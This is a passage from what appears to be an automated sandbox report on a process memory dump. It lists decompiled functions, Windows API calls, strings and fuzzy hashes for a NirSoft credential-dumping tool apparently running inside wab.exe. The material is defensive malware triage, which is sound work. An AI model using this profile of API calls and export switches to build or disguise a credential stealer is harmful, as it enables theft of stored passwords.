                    • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                    • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                    Function 00408560 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 182stringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                    • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                    • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                    • memset.MSVCRT ref: 004085CF
                    • memset.MSVCRT ref: 004085F1
                    • memset.MSVCRT ref: 00408606
                    • strcmp.MSVCRT ref: 00408645
                    • _mbscpy.MSVCRT ref: 004086DB
                    • _mbscpy.MSVCRT ref: 004086FA
                    • memset.MSVCRT ref: 0040870E
                    • strcmp.MSVCRT ref: 0040876B
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                    • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                    • String ID: ---
                    • API String ID: 3437578500-2854292027
                    • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                    • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                    • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                    • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                    Function 0041083A Relevance: 21.1, APIs: 14, Instructions: 137windowCOMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 0041087D
                    • memset.MSVCRT ref: 00410892
                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                    • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                    • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                    • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                    • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                    • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                    • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                    • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                    • GetSysColor.USER32(0000000F), ref: 00410999
                    • DeleteObject.GDI32(?), ref: 004109D0
                    • DeleteObject.GDI32(?), ref: 004109D6
                    • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                    • String ID:
                    • API String ID: 1010922700-0
                    • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                    • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                    • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                    • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                    Function 00418680 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                    • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                    • malloc.MSVCRT ref: 004186B7
                    • ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                    • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                    • ??3@YAXPAX@Z.MSVCRT ref: 004186E0
                    • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                    • malloc.MSVCRT ref: 004186FE
                    • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                    • ??3@YAXPAX@Z.MSVCRT ref: 00418716
                    • ??3@YAXPAX@Z.MSVCRT ref: 0041872A
                    • ??3@YAXPAX@Z.MSVCRT ref: 00418749
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@$FullNamePath$malloc$Version
                    • String ID: |A
                    • API String ID: 4233704886-1717621600
                    • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                    • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                    • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                    • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                    Function 004125F8 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: _wcsicmp
                    • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                    • API String ID: 2081463915-1959339147
                    • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                    • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                    • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                    • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                    Function 004138C1 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                    • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                    • FreeLibrary.KERNEL32(00000000), ref: 00413951
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                    • API String ID: 2012295524-70141382
                    • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                    • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                    • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                    • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                    Function 0041383D Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressProc$HandleModule
                    • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                    • API String ID: 667068680-3953557276
                    • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                    • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                    • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                    • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                    Function 00412172 Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetDC.USER32(00000000), ref: 004121FF
                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                    • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                    • SetBkMode.GDI32(?,00000001), ref: 00412232
                    • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                    • SelectObject.GDI32(?,?), ref: 00412251
                    • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                    • SelectObject.GDI32(00000014,00000005), ref: 00412291
                      • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                      • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                      • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                    • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                    • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                    • SetCursor.USER32(00000000), ref: 004122BC
                    • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                    • memcpy.MSVCRT ref: 0041234D
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                    • String ID:
                    • API String ID: 1700100422-0
                    • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                    • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                    • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                    • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                    Function 004111C1 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                    Download Yara Rule
                    APIs
                    • GetClientRect.USER32(?,?), ref: 004111E0
                    • GetWindowRect.USER32(?,?), ref: 004111F6
                    • GetWindowRect.USER32(?,?), ref: 0041120C
                    • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                    • GetWindowRect.USER32(00000000), ref: 0041124D
                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                    • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                    • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                    • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                    • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                    • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                    • EndDeferWindowPos.USER32(?), ref: 0041130B
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: Window$Defer$Rect$BeginClientItemPoints
                    • String ID:
                    • API String ID: 552707033-0
                    • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                    • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                    • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                    • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                    Function 0040C084 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 110stringfileCOMMON
                    Download Yara Rule
                    APIs
                    • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                      • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                      • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                      • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                    • memcpy.MSVCRT ref: 0040C11B
                    • strchr.MSVCRT ref: 0040C140
                    • strchr.MSVCRT ref: 0040C151
                    • _strlwr.MSVCRT ref: 0040C15F
                    • memset.MSVCRT ref: 0040C17A
                    • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                    • String ID: 4$h
                    • API String ID: 4066021378-1856150674
                    • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                    • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                    • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                    • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                    Function 00414621 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$_snwprintf
                    • String ID: %%0.%df
                    • API String ID: 3473751417-763548558
                    • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                    • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                    • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                    • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                    Function 004060A4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON
                    Download Yara Rule
                    APIs
                    • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                    • KillTimer.USER32(?,00000041), ref: 004060D7
                    • KillTimer.USER32(?,00000041), ref: 004060E8
                    • GetTickCount.KERNEL32 ref: 0040610B
                    • GetParent.USER32(?), ref: 00406136
                    • SendMessageW.USER32(00000000), ref: 0040613D
                    • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                    • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                    • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                    • String ID: A
                    • API String ID: 2892645895-3554254475
                    • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                    • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                    • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                    • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                    Function 0040D957 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                    Download Yara Rule
                    APIs
                    • LoadMenuW.USER32(?,?), ref: 0040D97F
                      • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                      • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                      • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                      • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                    • DestroyMenu.USER32(00000000), ref: 0040D99D
                    • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                    • GetDesktopWindow.USER32 ref: 0040D9FD
                    • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                    • memset.MSVCRT ref: 0040DA23
                    • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                    • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                    • DestroyWindow.USER32(00000005), ref: 0040DA70
                      • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                    • String ID: caption
                    • API String ID: 973020956-4135340389
                    • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                    • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                    • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                    • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                    Function 00410A60 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                    • <table dir="rtl"><tr><td>, xrefs: 00410B00
                    • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                    • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$_snwprintf$wcscpy
                    • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                    • API String ID: 1283228442-2366825230
                    • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                    • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                    • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                    • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                    Function 00413959 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                    Download Yara Rule
                    APIs
                    • wcschr.MSVCRT ref: 00413972
                    • wcscpy.MSVCRT ref: 00413982
                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                      • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                    • wcscpy.MSVCRT ref: 004139D1
                    • wcscat.MSVCRT ref: 004139DC
                    • memset.MSVCRT ref: 004139B8
                      • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                      • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                    • memset.MSVCRT ref: 00413A00
                    • memcpy.MSVCRT ref: 00413A1B
                    • wcscat.MSVCRT ref: 00413A27
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                    • String ID: \systemroot
                    • API String ID: 4173585201-1821301763
                    • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                    • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                    • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                    • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                    Function 00414BB0 Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: wcscpy
                    • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                    • API String ID: 1284135714-318151290
                    • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                    • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                    • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                    • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                    Function 0040D2AB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                    • String ID: 0$6
                    • API String ID: 4066108131-3849865405
                    • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                    • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                    • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                    • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                    Function 004082C7 Relevance: 15.2, APIs: 10, Instructions: 229COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 004082EF
                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                    • memset.MSVCRT ref: 00408362
                    • memset.MSVCRT ref: 00408377
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$ByteCharMultiWide
                    • String ID:
                    • API String ID: 290601579-0
                    • Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                    • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                    • Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                    • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                    Function 00444E84 Relevance: 15.2, APIs: 8, Strings: 2, Instructions: 183COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$memchrmemset
                    • String ID: PD$PD
                    • API String ID: 1581201632-2312785699
                    • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                    • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                    • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                    • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                    Function 00409F42 Relevance: 15.1, APIs: 10, Instructions: 103COMMON
                    Download Yara Rule
                    APIs
                    • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                    • GetSystemMetrics.USER32(00000010), ref: 00409F61
                    • GetDC.USER32(00000000), ref: 00409F6E
                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                    • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                    • GetWindowRect.USER32(?,?), ref: 00409FA0
                    • GetParent.USER32(?), ref: 00409FA5
                    • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                    • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                    Memory Dump Source
